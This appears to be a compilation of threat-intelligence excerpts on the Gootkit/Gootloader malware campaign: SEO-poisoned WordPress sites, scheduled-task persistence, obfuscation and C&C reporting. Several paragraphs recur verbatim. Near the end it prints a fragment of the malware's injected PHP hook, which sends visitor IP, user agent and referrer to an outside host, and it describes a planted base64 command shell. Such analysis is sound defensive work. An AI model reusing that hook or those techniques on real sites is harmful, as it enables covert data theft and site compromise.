GootKit

The communication sends the mothership the following parameters of the initial request, all in base64 encoded form: a: Unique server ID b: IP address of the unsuspecting visitor c: user agent d: referrer string

Gootkit relies on trojanized search engine optimization (SEO) social engineering techniques, similar to Yellow Cockatoo.

Gootloader uses malicious search engine optimization (SEO) techniques to squirm into Google search results.

The attackers may simply obtain the sites’ passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials...

The Gootloader malware family uses a distinctive form of social engineering to infect computers: Its creators lure people to visit compromised, legitimate WordPress websites using hijacked Google search results...

There are several ways in which a threat actor might be able to place a file into a WordPress site... a WordPress component may have had a vulnerability that permitted remote users to perform SQL injection or command execution exploits on the host server; the administrative WordPress password might have been stolen.

Storm-0324’s delivery chain begins with phishing emails referencing invoices or payments and containing a link to a SharePoint site that hosts a ZIP archive.

We additionally observed the creation of a scheduled task named “Business Aviation” with the command line “wscript REHABI~1.JS”... Persistence was obtained via CScript.exe executing the file SMALLU~1.js via a scheduled task named Destination Branding.

The first stage download server, where a PHP script serves the first stage JScript downloader script... The first stage download script ( down.php or join.php or about.php or index.php ) simply relays the incoming request to the mothership.

Upon review of the running processes, we were able to determine that a small JavaScript file was dropping a large JavaScript file... We additionally observed the creation of a scheduled task... utilizing WScript.exe to execute the second-stage payload of GootKit.

We additionally observed the creation of a scheduled task named “Business Aviation” with the command line “wscript REHABI~1.JS”... Persistence was obtained via CScript.exe executing the file SMALLU~1.js via a scheduled task named Destination Branding.

The attackers may simply obtain the sites’ passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials...

At this point we didn’t know exactly how the sites are compromised, but we knew from the report that malicious PHP code is somehow inserted into the WordPress installation.

This code contains a simple PHP command shell, which the Gootloader attackers can use to maintain access to compromised pages... If the compromised website receives an HTTPS POST with that string in it, the code on the page will decode and execute any base64 encoded commands it receives...

We additionally observed the creation of a scheduled task named “Business Aviation” with the command line “wscript REHABI~1.JS”... Persistence was obtained via CScript.exe executing the file SMALLU~1.js via a scheduled task named Destination Branding.

It then performs a process hollowing on that executable to load the Delphi component.

The attackers may simply obtain the sites’ passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials...

Every aspect of this process is obfuscated to such a degree... despite the fact that Gootloader’s creators use code obfuscation to an almost absurd degree. As part of the obfuscation, the attackers break up the code.

A string analysis of the dropped file was not useful in identifying its intent, as the JavaScript was heavily obfuscated... The decoder also identified various malicious domain names within the obfuscated strings.

It then performs a process hollowing on that executable to load the Delphi component.

The attackers may simply obtain the sites’ passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials...

The landing page code on the initial, compromised website validates visitors then redirects some of them to a second website... The server also geofences IP address ranges, and only allows requests to originate from specific countries of interest to the Gootloader threat actor.

The requests contained Base64-encoded cookies which, when decoded, showed enumeration information regarding device directories and host information... the process would read USERNAME and USER DOMAIN information and send the data to the URIs.

The landing page code on the initial, compromised website validates visitors then redirects some of them to a second website... The server also geofences IP address ranges, and only allows requests to originate from specific countries of interest to the Gootloader threat actor.

Spamhaus researchers issued listings for over 7,000 botnet Command & Control ("C&C") servers... These C&C servers enabled and controlled online crime such as credential theft, e-banking fraud, spam and DDoS attacks. They were also used for the retrieval of stolen data.

the malicious event handler hooks build the request to the “mothership”... wp_remote_get("http://my-game.biz/index.php?a=".base64_encode($_GET[$qwc4]). '&b='.base64_encode($_SERVER["REMOTE_ADDR"]). '&c='.base64_encode($_SERVER["HTTP_USER_AGENT"]). '&d='.base64_encode(wp_get_referer())

PowerEnum is also used to send tasks, which were originally stored on Dropbox, and more recently were hosted on Google Drive... The Google Drive link is the payload sent via raw TCP after PowerEnum fingerprinting.

FakeNet showed various domain names being reached out to with GET /xmlrpc.php HTTP/1.1 requests via Powershell.exe. The requests contained Base64-encoded cookies... showing enumeration information regarding device directories and host information.